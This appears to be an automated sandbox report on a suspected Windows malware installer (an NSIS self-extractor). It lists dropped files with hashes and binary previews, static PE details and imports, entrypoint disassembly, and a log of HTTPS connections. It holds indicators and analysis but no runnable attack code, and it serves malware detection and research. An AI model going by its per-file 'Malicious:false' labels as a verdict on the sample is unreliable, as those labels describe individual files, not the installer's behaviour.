                                      SSDEEP:48:eYGsZJaswkWb5y5SwsmAeeiVSRG8fcl6FH7tSVlPgc6pcAUkWz+CaN6wm0uln:wwaqEy5SwsLeeicgAcl6FbIVucAUEFq
                                      MD5:F4F390C25CFBB9F86EDAD76C437F6571
                                      SHA1:548390DEB8C7A5021676CB1E0C03FC6AABF89B98
                                      SHA-256:AF12D990703C8FC341CBF9FE7F5B51938408D5FE48CA388DB39BDCD35EDD90D3
                                      SHA-512:47F0520EAFA72308B188099F796E9713A4CFCDEA9BBBBF523136A371AEA3D4D167F3467708CE9EC6D82BC09862DA7D5BD122CB183796E948BCAB41665D07238A
                                      Malicious:false
                                      Preview:...;..............I..\.....z............B.........*.m............XA. ..w(X.........>............1.g.................."...8.....Q.."........g..K....2..@............L.......aT......X.....3.....4...............g.......Y.......*}...*........R:0v..r....t....#..P.....k.+........{.^............................{t2......k...3...g..\.-...s.......`.[Z..............P..$A.............b..............?...\.......aP....Bi.............b......^.?....6.Z.k...3.h..M..'.[..Qs......Is..i....Z....r.m........v...o...h@.......@"....t....]E..n....S....m..........*........)..................f.....B....)..W..........d......?....7...........o...k...&....\.....4.b..f....S.w.i.......~........04...Ch......j.T.!}.................p....{.-..................b...........m...J.....k../.0d..........B.Z{MwV...{.........T.-............6..........l..)Ag..4....:...8.R....+....e...;..............................Q..C...........}..x..?...x......)..N..........H......c.(..x..>.\.............uv[.H;m..."...:...f....5..$.!..

                                      C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Nonsacrilegiously\divisioner.par

                                      Download File
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:OpenPGP Secret Key
                                      Category:dropped
                                      Size (bytes):11048
                                      Entropy (8bit):4.872168059153243
                                      Encrypted:false
                                      SSDEEP:192:dZ0sW/87yXEweaM8tpic2SGGfMIyUlj0wggbxIrfmsxiS:dZ0sw87zjBspic2SGGR1lj0wgoxI3J
                                      MD5:7721863171BA672F3F660981C836E35B
                                      SHA1:6F7A2C0D30D51CA6B31F0FCC803D58100D1D54BE
                                      SHA-256:290F31B8FB70C5E745918DF19CF3A2DD3E7D368A2BC5D9C79611D004AB2AC9D8
                                      SHA-512:0474541FFE562D37BB638EA5500189F4E093E59A6CE8F4039E1BDD4FFB4EF7CBFA18D6850F81DA416DCF91BA40836C73684BE405091708351F5ACD00DD27CC3C
                                      Malicious:false
                                      Preview:.^.....H..........Q..C...........5...>.....6`d.................h7..@...v.......O........'...:....y......".....D.<......p.....)...........1.....x............~..........m......'.4..Y..s..a.,.....8.......{....................,.....f.g.............j.+q..=....~.................A..6..kN.....w.P...E....................P..S....6*...P,.\.....X........."....."....7......................7........-.....5F%C..~H.........[^........C^......h.B....6o..-.gj......u.F...r...!.Xb........h.....,'......$..b............>t...X.x...vh..........5...y......A.y...y...Q...@......O......v.......W......2...I..............1b..a...?......v\.......v........ ........M.4........ .-6+.......\./.........G..........k..h....Z.=..........*X....N.............+........u...............=gE.r...........w.......F\...............{....5.......:.....b.......".......k.............d.(..i...Q.....<.....a.j...C........<....b..........Z........................~13...^B.......#....z6..R...a........Ny|.......|.....z..c..Y........)

                                      C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Nonsacrilegiously\hyperalgebra.txt

                                      Download File
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):592
                                      Entropy (8bit):4.204861403479884
                                      Encrypted:false
                                      SSDEEP:12:PjO2xFPAeLUzV3ByBRCs+4LlMvJLHYEEHaBAH2s2N+k/+IQI:PiOF3UzlByBRCsVGtYEYWsY+E+IQI
                                      MD5:8097E08408C796656D6FBE5B4011609A
                                      SHA1:234444944CBE5C50C7DC38FD51C565CCA3276164
                                      SHA-256:24677BD64BDFB8D904A096D013232993C005856ED59AA5FFBE504EB4F761CD75
                                      SHA-512:127264BCA9489E3CEF728204AA128E705730513025E8B7E0F8464ABE5D0EDEE3FC8D5043E4DA7D8A67A3A115AEF7237BC04C6CD5CD956923AFC1921FD3D29638
                                      Malicious:false
                                      Preview:gasterozooid blottedes undershrievery reorientation konsistoriemedlems dokumentdisketten brevstemmende defilerede studiekammerater forstuvelsens..metastrophic kabiet serb aflbsrens ordmnstrets simulatoropgave tholes,frygtlse cloudlessly fylderiets kpheste isabelles unsalvageably appelerer optics infralyd theligonaceae suspensively..snerp separatkabinettet paralegal xenofobiernes chervante stivelseskorn achromobacterieae,brygmester brevaabners kontraheredes pullulated musketerens studentereksamener poliad,underarmsmusklen askorbinsyretabletten backtracks stvises termcap kinoorgels trog.

                                      C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Nonsacrilegiously\jaqueline.bow

                                      Download File
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):15062
                                      Entropy (8bit):4.9357451772131204
                                      Encrypted:false
                                      SSDEEP:384:pl7QxurtO8pawzlNSBjw6YhtRK61R1f7W0:P7QxuhO8pawgwXR1TW0
                                      MD5:56013432CE9F5F20196ED4D8766EB72A
                                      SHA1:4DF3B7CDFFD65DD9D14BB212080C608703906554
                                      SHA-256:71341213976B73E52A10998CCB06599C8EDC6E7D12E3338927FE56E5DABAE760
                                      SHA-512:C8BB9713C4E9B7CB95C452FA8E112B0C11A92F7C3661D902E50B51552981AB60404E5D84FB3CFC7B4794963C06E3B0E73892794CDAAF95846B8B67B838AE384A
                                      Malicious:false
                                      Preview:....u..p...!.ht~.......L................/y...................G8.....R..}.......;..............%...-.......L.?.b......................'3S......P.#..F....&...v.B.I.....H#........q......7..........d.o....fA......B..T9.........7....y....>.....>............}...........Q....h......_......F.V.CWA.........~..f....K..........................n............C.)...l../......9.....,...........a...$.......p....S........x......-....... =...A.....4'.S.~../t..Mm...........[j..7........f..c....s........._.............. ...5M.H.pW...../........=....}........'d.....Z..7..........;....^....l...^............8............:....4.........R@^........U............@.........~..*.Jh..Qf.{..i...n..........a.. .....D.......a.............z......@m../.ft.........^.........d...H......#.......-._...$........._...a...................................E...........R.?........Nn....1.........R..>.E...J..........j...........]........#............3.|...........Y.2.J.*_cH....7T...........1.~..H..."u.....\..........u.

                                      C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Nonsacrilegiously\macroconidium.fan

                                      Download File
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:OpenPGP Public Key
                                      Category:dropped
                                      Size (bytes):13588
                                      Entropy (8bit):4.923594985159061
                                      Encrypted:false
                                      SSDEEP:192:JwxK7lxC6+88oXtWeJvBdfUW8aZcrZFb0IDAeXBZ3QHju4LEFdTKUAZNW:Jd+6+88neJvB78aiZZDDXBZADu4LaSZQ
                                      MD5:A1BB2C0226A81753C3C2F6FA6562B6F3
                                      SHA1:EDC6ECAFA090B95F7B4A3E3B26A6A4E5539D932B
                                      SHA-256:F89E9A19B6D6A219D9AAC39623DC5C30CFEA6519CC7376E18656A5A7C999DC53
                                      SHA-512:26695DBF9FDE77625A12BE1F12797DF821B8B20204D4BE58D5E43E27159908D7AFBA4ADAA1B39438D931C076854877B3008A4F12CE984053C877D5C89E15F000
                                      Malicious:false
                                      Preview:..........W.......(..........Y.Ir...G.........z.#..>%...#........t..v+....3......ug|{K.............f.7...............8.........N$...............................C....<....P..b............o....(R.d.._...x...2.............b..>...j........^..Q..p...)....&.....&....S......A..<....X."...%....f)......O...........f.{...)................m.....!..M.J..e..8.............._..<.~.X...Y6..../........x....Y.a..,....................5....k9................B.......A...............t.......m.....?.....aU..V..'........v..C.N....=+.D...{..?f<...........(.&..z...~.....8...^...Z..x.......;%H....r...j.&..........'........h~......t.f......3...............=...@.7.......|...l.......0.......y.N...w..........l....Z...K.|............*.........-...TS.|.O..4.x....;........Y..E...............Q............k.l.../..?82....................F.....^.N...X|....@....8.(........U.(.......t*......a.........<?..w....4.e..5....,............../..y..Z...i..P(.....`.^.......'......G.}.....\...............8..F.........

                                      C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Reallnsnedgangen241.sta

                                      Download File
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8230
                                      Entropy (8bit):4.9095691270975985
                                      Encrypted:false
                                      SSDEEP:192:ADjauT3yXT1VRXVkCGOeTC3WgdgTNb7dYSxs446HTXZG:ADjaZDFV7Hx3Wgd8b757k
                                      MD5:6E58E362553B5789E1069A0179B61372
                                      SHA1:99780077DCED2149B6BF80439172FF98DF8F90E6
                                      SHA-256:EF7907372F05F11488321AB0694B0C59BB487F9B8C87E6C7AD93D33C226EB194
                                      SHA-512:6FB5A47A7B8937D898FF58D4FC5ED7959AB10C9E3EDDF66585BE7FB011CF46AC7EDA4FDCBF81297DEB841DE807A3CA2A23C4B205C71CDDEF8D8DC87B1B15EFB0
                                      Malicious:false
                                      Preview:.....l.................}..m.............[....L..J.D.......$............n...................=..................9j...................v...................x..C.....o.{P.....]S._............#...B.....9.......[.........RB%P...............I...K.r..N...+.........V.{.....1..........1..........`.........O..._.......f.........s.....m.@.$.m............u..l;.............{.4ON.......1M....*G..?........mE3....U......#....n...>%.........I.....n.._N.ao.`........co?..&......96.......t.8z..pa(.[.......c......r......AS...|..........s^......U...............|....u...f.s..V..............A..J...............~.5t`..............|..B.q...b......Q..5....&...2........).{.E...8..............D.....'.....#......;.......5..`.QWr.K..u...........A.C?.....~..........d7..........Kri..~........b...l.....k.J.................j........5.........2.w.......*..........d.........Q.........0.`^N.....K............?U..........;.".S.L....,...=...._....................fc...n...Q.................8.........a.s.........7.....

                                      C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stephanis.Bin

                                      Download File
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):358713
                                      Entropy (8bit):7.648793540736881
                                      Encrypted:false
                                      SSDEEP:6144:uKPS3s/UriKDyqFZ8q/Uj6iYTVhKstsXxp0TL6OOGUMpo6hcHaj3jT:3NiiKDs0hKMsBprznM3fz
                                      MD5:7F347CFA8F27E352ED83C3BB88C5057B
                                      SHA1:8EE750C1E86644CA4E938CE66EAC4C50207C1B21
                                      SHA-256:CC97921E1FFF1EE9561EA1D79F6FF1F297AB05004AE150828E33A2C032C3C37E
                                      SHA-512:09D6C2C4C7EACF5F5FF9397CC13E5EF8A1A9565F5D292071C96A91969B3F0E029D0579F7CC2DEE6B5A90CC67E3F7E7039572C165987B1655C7C871AD24B95DDB
                                      Malicious:false
                                      Preview:............DDD....yyyyyyy..zzzzz.........Z.............yyyy.....Q..3.N.R.............~......LL.......""....... ............8.L.00......WW...................G...k....................1.66.a......OO.........f.@@.K..,,....................,,...?...66...........EE........RR.ppp.............]]]]]]]].........../....Q. .~......].Y....aaa.Y.D.....F....JJJJJ...a...........JJJ....UU.888888........R..vvvv......^^....44.~~~...L.1......[..........................................GG...................eeeee.f....oo.h.b...pp.........V..................i............}}}.............OO.~......b....t...a.hh............DD.........EE.n.......{..............F.....................M.......h.==......{........................ffff........^...............T....................nnn...]].........II................vvv..A....11...........?.....C............H.............\\...............S.0................1..x..@..........9......................eee....NNNNNNNNN.............................................h..........^....

                                      C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Trykkestederne.dre

                                      Download File
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1767
                                      Entropy (8bit):4.936734149511583
                                      Encrypted:false
                                      SSDEEP:24:n4sZF5zb4UBKl2YkTL9us5GTtqBXclmjZk/7V91eIS9naSCKvDwoqjLpKk1Na:nNJ+rkvspOclmdkzX1L8aS70ouUaa
                                      MD5:9A172303DA4D5A6FFFA3583CD88A6848
                                      SHA1:A59F712638898ED08E235ED321B8F3033F32B324
                                      SHA-256:E99BB7DF5EA4A3983D7308A41630A8B1128A1F7E0E59B7F02511DFC71E67BDC4
                                      SHA-512:4C6755EA315DCA8868EA650CFAEE595D60B910A6829DF232CDDB617318BD81B40A8E407E5B5135A485EEDD76265A04A2FF75DBE656C5D216F1EF0672EAAF5631
                                      Malicious:false
                                      Preview:......]$z....Ak.....o.M..n..#..@.5C.......h..a......Y.......U....a..C...=x.+....."Y......x.......t...........(..........k...0@.......#...Y....(................".....k..... .........A...|...q............!....d...t....../S......Y.Q...s...).......p.T.....".0.._..MY.A..............P.B..v......|...0...0j........3[)./.........u0..M....._#.........z........*.`....;.........3..D...0..... ..`..............S.......H..y......v1..G...................................i...L).P..$....^....#........h_..........8#...[Qy............ZK..D>.....r......s.x.O.y!..H...........5....8....'.|..........G/.:....2U=|......P........>.......r....K).P..l..........(..KY.g......n..9....\......Pm..............r.........0....'................J.q=...X.d......S.......l.....}.[..............m.IX.....3......&.......1......s.....(.L...........q...4{.....w..]..."..Q.........L..;.....i8.............I.e...{....r....E.......0>...e.L.Rlg.......]J.r......i..b...=...k<.5......................w.....T...../........S...#-.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.947296688885364
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:fJuwM4Bwi7.exe
                                      File size:600'280 bytes
                                      MD5:0cb5485c0840cf976767bc45fb0b45d4
                                      SHA1:3eee45faada0a0ee309065cc279b6c38e6dd809b
                                      SHA256:82940860d0091481df6eb2a273504bd2066f83649ffd87dffe03582440a938cc
                                      SHA512:dc7a88850a94809beeaccee769b580d6a99af3ac7b53b4720856cb341c3b57144480eca4b0ed00c791fc84d9a8544f255289b479ab97df407f1caaf9dbad9d56
                                      SSDEEP:12288:2K9/JmMgq+TiZFJVsTej4jsLhzBMiMMx8cjDBlDvvK1adEMNqn5+:tj+Tirqej1RRx8O/vPdE1nQ
                                      TLSH:61D4125436E2D47EEA402775DFA7A7FAC2249D28C6251B0F0F953FBE7D360518E28221
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................^...........2.......p....@

                                      File Icon

                                      Icon Hash:4740490d27a52145

                                      Static PE Info

                                      General

                                      Entrypoint:0x403217
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x55C15CE3 [Wed Aug 5 00:46:27 2015 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 00000184h
                                      push ebx
                                      push ebp
                                      push esi
                                      xor ebx, ebx
                                      push edi
                                      mov dword ptr [esp+18h], ebx
                                      mov dword ptr [esp+10h], 00409130h
                                      mov dword ptr [esp+20h], ebx
                                      mov byte ptr [esp+14h], 00000020h
                                      call dword ptr [00407034h]
                                      push 00008001h
                                      call dword ptr [004070B4h]
                                      push ebx
                                      call dword ptr [0040728Ch]
                                      push 00000009h
                                      mov dword ptr [004237B8h], eax
                                      call 00007F2AB0C534CAh
                                      mov dword ptr [00423704h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+38h]
                                      push 00000160h
                                      push eax
                                      push ebx
                                      push 0041ECB8h
                                      call dword ptr [00407164h]
                                      push 004091E4h
                                      push 00422F00h
                                      call 00007F2AB0C53174h
                                      call dword ptr [004070B0h]
                                      mov ebp, 00429000h
                                      push eax
                                      push ebp
                                      call 00007F2AB0C53162h
                                      push ebx
                                      call dword ptr [00407118h]
                                      cmp byte ptr [00429000h], 00000022h
                                      mov dword ptr [00423700h], eax
                                      mov eax, ebp
                                      jne 00007F2AB0C506CCh
                                      mov byte ptr [esp+14h], 00000022h
                                      mov eax, 00429001h
                                      push dword ptr [esp+14h]
                                      push eax
                                      call 00007F2AB0C52BF2h
                                      push eax
                                      call dword ptr [00407220h]
                                      mov dword ptr [esp+1Ch], eax
                                      jmp 00007F2AB0C50785h
                                      cmp cl, 00000020h
                                      jne 00007F2AB0C506C8h
                                      inc eax
                                      cmp byte ptr [eax], 00000020h
                                      je 00007F2AB0C506BCh

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x2b6d8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x5c3a0x5e00e5e7adda692e6e028f515fe3daa2b69fFalse0.658951130319149data6.410406825129756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x70000x11ce0x12005801d712ecba58aa87d1e7d1aa24f3aaFalse0.4522569444444444OpenPGP Secret Key5.236122428806677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x90000x1a7f80x400cc58d0a55ac015d8f1470ea90f440596False0.615234375data5.02661163746607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x240000x140000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x380000x2b6d80x2b800b6d42514c2cc09fb8e6265d6a2c193e7False0.9366244612068966data7.857509251924338IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x384180x18ef9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000401421619981
                                      RT_ICON0x513180x833dPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9935410899782718
                                      RT_ICON0x596580x350cPNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States1.0008100147275405
                                      RT_ICON0x5cb680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6025933609958506
                                      RT_ICON0x5f1100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6329737335834896
                                      RT_ICON0x601b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.7006929637526652
                                      RT_ICON0x610600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7924187725631769
                                      RT_ICON0x619080x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.5280487804878049
                                      RT_ICON0x61f700x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7109826589595376
                                      RT_ICON0x624d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7225177304964538
                                      RT_ICON0x629400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.6854838709677419
                                      RT_ICON0x62c280x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.7263513513513513
                                      RT_DIALOG0x62d500x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x62e500x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x62f700xc4dataEnglishUnited States0.5918367346938775
                                      RT_DIALOG0x630380x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x630980xaedataEnglishUnited States0.6264367816091954
                                      RT_VERSION0x631480x24cdataEnglishUnited States0.5255102040816326
                                      RT_MANIFEST0x633980x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447

                                      Imports

                                      DLLImport
                                      KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                      USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                      ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                      ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jun 4, 2024 14:14:44.453363895 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:44.453459978 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:44.453649998 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:44.483815908 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:44.483855963 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:44.766186953 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:44.766407967 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:44.766824961 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:44.767033100 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:44.831353903 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:44.831365108 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:44.831605911 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:44.831856966 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:44.834187031 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:44.876182079 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:45.064644098 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:45.064723969 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:45.064836979 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:45.064888000 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:45.068880081 CEST49842443192.168.11.30142.250.217.174
                                      Jun 4, 2024 14:14:45.068897009 CEST44349842142.250.217.174192.168.11.30
                                      Jun 4, 2024 14:14:45.222728968 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:45.222767115 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:45.222995996 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:45.223159075 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:45.223182917 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:45.468676090 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:45.468875885 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:45.473030090 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:45.473048925 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:45.473504066 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:45.473638058 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:45.473985910 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:45.516259909 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.172717094 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.172952890 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.173019886 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.188994884 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.189186096 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.189253092 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.197231054 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.197494984 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.205547094 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.205780029 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.205809116 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.206068039 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.290474892 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.290735006 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.290757895 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.290945053 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.294549942 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.294867039 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.294888973 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.295085907 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.302778006 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.303009033 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.303025961 CEST44349843172.217.215.132192.168.11.30
